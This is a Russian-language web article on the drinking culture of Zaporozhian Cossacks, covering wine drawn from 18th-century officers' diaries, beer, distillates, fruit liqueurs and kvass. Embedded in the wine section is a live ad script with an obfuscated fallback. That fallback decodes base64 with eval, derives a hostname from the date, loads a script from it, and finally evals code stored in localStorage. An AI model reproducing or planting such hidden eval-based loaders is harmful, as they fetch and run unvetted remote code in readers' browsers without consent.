Украинский фольклор часто рассказывает истории о подвигах казаков и бравых победах. Кроме этого часто можно встретить сюжеты о веселых посиделках казаков в кабаках. «Шинок» или «корчма» был местом, где собирались для разговоров за тарелкой вареников и кружкой чего-то горячительного. Запорожцы пили с душой и выбирали разные виды напитков. Вино среди них не исключение.
Вам вина насыпать?
Дневники представителей казацкой старшины XVIII века Якова Марковича и Николая Ханенко рассказывают нам про то, что казаки часто пили вино. Этот напиток был неотъемлемой частью социокультурной жизни старшины Запорожья. Но в то время Украина была не винодельческим краем. Напиток импортировали из Франции или с территории современной Молдовы. Часто в дневниках встречается «Волошское вино» с южных территорий современной Румынии, «венгерские» и крымские вина.
Маркович на страницах дневников упоминает более полутора десятков наименований виноградных вин. Он разбирался в сортах и качестве алкоголя, знал как хранить вино и ориентировался в ценах. Условия хранения, качество вина и тары лично контролировал старшина. Скорее всего у него был винный погреб или шкаф для вина. Современные ценители вина предпочитают винный шкаф, который имеет больше возможностей по управлению температурным режимом и влажностью. Обычно их устанавливают в заведениях или в домах, где хозяева, как и казаки, любят насладиться виноградным напитком. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }
Что еще любили выпить казаки
Культура казачества славилась шумными посиделками и хорошими напитками. В исторических источниках можно встретить рассказы о том, как казаки коротали зимние вечера и летние ночи. Всегда весело, вкусно и с душой. Так что же кроме вина любили выпить запорожцы?
Пиво. Не всюду питьевую воду можно было употреблять в чистом виде. Поэтому воду просто заменяли пивом. Мемуаристы говорят о двух категориях пива: хмельное (алкогольное) и сладковатое (менее крепкое). Последнее в основном и было заменителем питьевой воды. Даже для детей. Пиво было также составной частью многих блюд: супов, соусов, поливок (для каши и печеного мяса). Было оно и лекарством в сочетании с травами или сливочным маслом.Водка, но не совсем. Водки изначально казаки не пили. Напитки Гетманщина унаследовала преимущественно от средневековой культуры Руси и Литовско-Польского периода. Первоначально казаки пили пиво и питьевые меды. А что-то похожее на водку начало появляться с XVI века. Это были зерновые и солодовые дистилляты. На их основе делали ароматические ликеры, добавляя пряности, травы, фруктовые сиропы и мед. Методом холодного настаивания на плодах получали известные украинские вишневки, дуловки (из груш) и сливянки.
Но казаки пили не только алкоголь. Они любили выпить кофе, чай или узвар. Простой народ не имел доступа к французским винам, поэтому находили другие решения, чтобы развеселить дух и утолить жажду тела. Вместо воды пили также фруктовый квас. Делали его преимущественно из груш и яблок. Спелые плоды резали и заливали водой. Могли добавлять хмель. (adsbygoogle = window.adsbygoogle || []).push({});
Источник: https://akzent.zp.ua/vino-i-napitki-kotorye-pili-zaporozhskie-kazaki/
Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook